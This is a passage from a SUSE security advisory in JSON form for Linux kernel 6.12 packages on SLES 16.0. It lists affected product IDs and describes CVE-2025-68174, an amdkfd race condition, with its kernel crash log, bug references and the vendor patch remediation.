"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "low"
}
],
"title": "CVE-2025-40363"
},
{
"cve": "CVE-2025-68174",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68174"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namd/amdkfd: enhance kfd process check in switch partition\n\ncurrent switch partition only check if kfd_processes_table is empty.\nkfd_prcesses_table entry is deleted in kfd_process_notifier_release, but\nkfd_process tear down is in kfd_process_wq_release.\n\nconsider two processes:\n\nProcess A (workqueue) -\u003e kfd_process_wq_release -\u003e Access kfd_node member\nProcess B switch partition -\u003e amdgpu_xcp_pre_partition_switch -\u003e amdgpu_amdkfd_device_fini_sw\n-\u003e kfd_node tear down.\n\nProcess A and B may trigger a race as shown in dmesg log.\n\nThis patch is to resolve the race by adding an atomic kfd_process counter\nkfd_processes_count, it increment as create kfd process, decrement as\nfinish kfd_process_wq_release.\n\nv2: Put kfd_processes_count per kfd_dev, move decrement to kfd_process_destroy_pdds\nand bug fix. (Philip Yang)\n\n[3966658.307702] divide error: 0000 [#1] SMP NOPTI\n[3966658.350818] i10nm_edac\n[3966658.356318] CPU: 124 PID: 38435 Comm: kworker/124:0 Kdump: loaded Tainted\n[3966658.356890] Workqueue: kfd_process_wq kfd_process_wq_release [amdgpu]\n[3966658.362839] nfit\n[3966658.366457] RIP: 0010:kfd_get_num_sdma_engines+0x17/0x40 [amdgpu]\n[3966658.366460] Code: 00 00 e9 ac 81 02 00 66 66 2e 0f 1f 84 00 00 00 00 00 90 0f 1f 44 00 00 48 8b 4f 08 48 8b b7 00 01 00 00 8b 81 58 26 03 00 99 \u003cf7\u003e be b8 01 00 00 80 b9 70 2e 00 00 00 74 0b 83 f8 02 ba 02 00 00\n[3966658.380967] x86_pkg_temp_thermal\n[3966658.391529] RSP: 0018:ffffc900a0edfdd8 EFLAGS: 00010246\n[3966658.391531] RAX: 0000000000000008 RBX: ffff8974e593b800 RCX: ffff888645900000\n[3966658.391531] RDX: 0000000000000000 RSI: ffff888129154400 RDI: ffff888129151c00\n[3966658.391532] RBP: ffff8883ad79d400 R08: 0000000000000000 R09: ffff8890d2750af4\n[3966658.391532] R10: 0000000000000018 R11: 0000000000000018 R12: 0000000000000000\n[3966658.391533] R13: ffff8883ad79d400 R14: ffffe87ff662ba00 R15: ffff8974e593b800\n[3966658.391533] FS: 0000000000000000(0000) GS:ffff88fe7f600000(0000) knlGS:0000000000000000\n[3966658.391534] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[3966658.391534] CR2: 0000000000d71000 CR3: 000000dd0e970004 CR4: 0000000002770ee0\n[3966658.391535] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[3966658.391535] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[3966658.391536] PKRU: 55555554\n[3966658.391536] Call Trace:\n[3966658.391674] deallocate_sdma_queue+0x38/0xa0 [amdgpu]\n[3966658.391762] process_termination_cpsch+0x1ed/0x480 [amdgpu]\n[3966658.399754] intel_powerclamp\n[3966658.402831] kfd_process_dequeue_from_all_devices+0x5b/0xc0 [amdgpu]\n[3966658.402908] kfd_process_wq_release+0x1a/0x1a0 [amdgpu]\n[3966658.410516] coretemp\n[3966658.434016] process_one_work+0x1ad/0x380\n[3966658.434021] worker_thread+0x49/0x310\n[3966658.438963] kvm_intel\n[3966658.446041] ? process_one_work+0x380/0x380\n[3966658.446045] kthread+0x118/0x140\n[3966658.446047] ? __kthread_bind_mask+0x60/0x60\n[3966658.446050] ret_from_fork+0x1f/0x30\n[3966658.446053] Modules linked in: kpatch_20765354(OEK)\n[3966658.455310] kvm\n[3966658.464534] mptcp_diag xsk_diag raw_diag unix_diag af_packet_diag netlink_diag udp_diag act_pedit act_mirred act_vlan cls_flower kpatch_21951273(OEK) kpatch_18424469(OEK) kpatch_19749756(OEK)\n[3966658.473462] idxd_mdev\n[3966658.482306] kpatch_17971294(OEK) sch_ingress xt_conntrack amdgpu(OE) amdxcp(OE) amddrm_buddy(OE) amd_sched(OE) amdttm(OE) amdkcl(OE) intel_ifs iptable_mangle tcm_loop target_core_pscsi tcp_diag target_core_file inet_diag target_core_iblock target_core_user target_core_mod coldpgs kpatch_18383292(OEK) ip6table_nat ip6table_filter ip6_tables ip_set_hash_ipportip ip_set_hash_ipportnet ip_set_hash_ipport ip_set_bitmap_port xt_comment iptable_nat nf_nat iptable_filter ip_tables ip_set ip_vs_sh ip_vs_wrr ip_vs_rr ip_vs nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 sn_core_odd(OE) i40e overlay binfmt_misc tun bonding(OE) aisqos(OE) aisqo\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68174",
"url": "https://www.suse.com/security/cve/CVE-2025-68174"
},
{
"category": "external",
"summary": "SUSE Bug 1255327 for CVE-2025-68174",
"url": "https://bugzilla.suse.com/1255327"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
